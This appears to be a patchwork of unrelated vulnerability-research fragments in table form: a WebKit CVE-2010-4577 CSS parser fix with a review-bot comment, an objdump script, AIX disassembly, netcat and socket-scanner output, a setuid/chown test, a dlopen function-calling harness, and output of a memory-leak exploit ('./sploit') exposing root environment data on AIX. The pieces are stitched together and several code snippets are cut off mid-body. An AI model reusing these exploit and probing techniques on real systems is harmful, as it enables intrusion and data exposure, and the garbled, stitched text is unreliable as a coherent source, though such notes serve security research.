| CVE-2010-4577 | |
| Red Hat - https://bugs.webkit.org/show_bug.cgi?id=49883 / http://trac.webkit.org/changeset/72685 | |
| Bug report inaccessible but changeset: | |
| CSSParserValueList* args = val->function->args.get(); | |
| 3632 3632 if (args && args->size() == 1) { | |
| 3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma) { | |
| 3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma && (args->current()->unit == CSSPrimitiveValue::CSS_STRING || args->current()->unit == CSSPrimitiveValue::CSS_IDENT)) { |
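Review bot: on the changed line 3633, the added condition dereferences args->current() twice and depends on the args->size() == 1 check on line 3632 to guarantee that current() is non-null. Reading the single argument into a local pointer once and testing its unit against CSS_STRING and CSS_IDENT would make that dependency explicit and keep the line readable. A regression test that passes a local() argument that is neither a string nor an identifier would pin down the behaviour this type check is meant to enforce.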
| #!/bin/sh | |
| BINFILENAME="${1}" | |
| tempfilename="`tempfile`" | |
| echo "set pagination off" > "${tempfilename}" | |
| # | grep ":$" | grep -v "\." | cut -f 2 -d "<" | cut -f 1 -d ">" | cut -f 1 -d "@" | |
| # | grep "@plt" | cut -f 2 -d "<" | cut -f 1 -d "@" | |
| objdump -D "${BINFILENAME}" | grep ":$" | grep -v "\." | cut -f 2 -d "<" | cut -f 1 -d ">" | cut -f 1 -d "@" | sort | uniq | while read line | |
| do |
| .text:10000354 .using unk_30000BB4, %r31 | |
| .text:10000354 stw %r3, 0x110+var_28(%sp) | |
| .text:10000358 addi %r3, %r31, 0x48C # a_dbgcmd_lquery # "_DBGCMD_LQUERYLV" | |
| .text:1000035C bl .getenv | |
| .text:10000360 lwz %rtoc, 0x110+saved_toc(%sp) | |
| .text:10000364 lwz %r29, off_30001568 # dword_300015E4 | |
| .text:10000368 .using dword_300015E4, %r29 | |
| .text:10000368 cmpwi %r3, 0 | |
| .text:1000036C bne loc_100006D0 |
| FreeBSD 9.2-RC1: | |
| $ nc -n -vv -l -p 9090 | hexdump -C | |
| listening on [any] 9090 ... | |
| connect to [192.168.x.y] from (UNKNOWN) [192.168.124.194] 52680 | |
| 00000000 68 65 6c 6c 6f 0a 00 00 00 00 00 00 00 00 00 00 |hello...........| | |
| sent 0, rcvd 30 | |
| 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |..............| | |
| 0000001e |
| $ sudo getcap `which ping` | |
| sudo getcap `which ping` | |
| [sudo] password for xx: | |
| /bin/ping = cap_net_raw+ep |
| $ find / -type s | ./UNIXSocketScanner.pl -x 5 -p ./probes -n /usr/share/nmap/nmap-service-probes | |
| ... | |
| /tmp/akonadi-xxx.HoHuFd/mysql.socket | |
| + matches nmap-response-mysql | |
| + matches nmap-probe-NULL | |
| /tmp/akonadi-xxx.HoHuFd/akonadiserver.socket | |
| /tmp/ksocket-xxx/klauncherMT5682.slave-socket | |
| /tmp/ksocket-xxx/kio_http_cache_cleaner | |
| /tmp/ksocket-xxx/kdeinit4__0 | |
| /tmp/.ICE-unix/5725 |
| $ ./sploit 2000 $$ | |
| maximumleak: 2000 | |
| target: 14876824 | |
| ... ...........n .......bash.......4.....Sq...NQ...@..../usr/lib/libiconv.a.shr4.o.....4.....R........> ..../usr/lib/libi18n.a.shr.o.......0.....R....-u.RQ(..#4/usr/lib/nls/loc/en_US.....4.....Q.....>..f....(/usr/lib/libcrypt.a.shr.o......0.....f.......5p...../usr/lib/libdl.a.shr.o.....8...........P.e.0..HV/usr/lib/libcurses.a.shr42.o.utd...<.....M.......)....?./usr/lib/libpthreads.a.shr_xpg5.o......<.....Q....1_.$....! /usr/lib/libpthreads.a.shr_comm.o.ip.............=...x....eh/usr/lib/threads/libc.a.shr.o...rc.teboot.d........2.......S.(..rc.trustedboot.............3.......r. ..rc.wpars...........4......... ..resolv.conf........5......... ..route.....[`.......6.......-....rpc........7......... ..rpc.pcnfsd.c.......8.......D....rpm........9......... ..rsvpd.conf.........:......... ..screenrc...........;.......P. ..securetcpip........<......... ..security...........=.......v. ..sendmail.cf........>......... ..services...........?........ |
| $ id | |
| uid=208(tmb) gid=1(staff) | |
| $ ./sploit 1000000 -1 | |
| maxiumumleak: 1000000 | |
| target: 17760424 | |
| $031097N 04j0a06000000000I404d0Qa109>f086f0801(0000:/05d01005=9dfff0xf6f00deh0000/usr/java5/binLC_ALL=CLC__FASTMSG=trueLOGNAME=rootLOCPATH=/usr/lib/nls/locODMPATH=/etc/objrepos:LDR_CNTRL=MAXDATA=0x80000000USER=rootAUTHSTATE=compatSHELL=/usr/bin/kshODMDIR=/etc/objreposHOME=/TERM=dumbPWD=/TZ=GMT0BSTNLSPATH=/usr/lib/nls/msg/%L/%N:/usr/lib/nls/msg/%L/%N.catLIBPATH=/usr/java14/jre/bin:/usr/java14/jre/bin/classic:/usr/java5/jre/bin:/usr/java5/jre/bin/classic: |
| On Linux: | |
| $ date && touch foo && chmod u+xs foo && sudo chown 0:0 foo && ls -l foo && date | |
| Sun 26 Apr 15:10:58 BST 2015 | |
| -rwxr--r-- 1 root root 0 Apr 26 15:10 foo | |
| Sun 26 Apr 15:10:58 BST 2015 | |
| On other OS (iOS in this case): | |
| $ date && touch foo && chmod u+xs foo && sudo chown 0:0 foo && ls -l foo && date |
| #include <dlfcn.h> | |
| #include <stdio.h> | |
| int main(int argc, char **argv) { | |
| void *libraryhandle; | |
| int (*functionpointer)(void *, void *, void *, void *, void *, void *, void *, void *, void *); | |
| int functionresult; | |
| libraryhandle = dlopen(argv[1], RTLD_NOW); | |
| functionpointer = dlsym(libraryhandle, argv[2]); | |
| functionresult = functionpointer(argv[3] ? argv[3] : NULL, argv[4] ? argv[4] : NULL, argv[5] ? argv[5] : NULL, argv[6] ? argv[6] : NULL, argv[7] ? argv[7] : NULL, argv[8] ? argv[8] : NULL, argv[9] ? argv[9] : NULL, argv[10] ? argv[10] : NULL, argv[11] ? argv[11] : NULL); |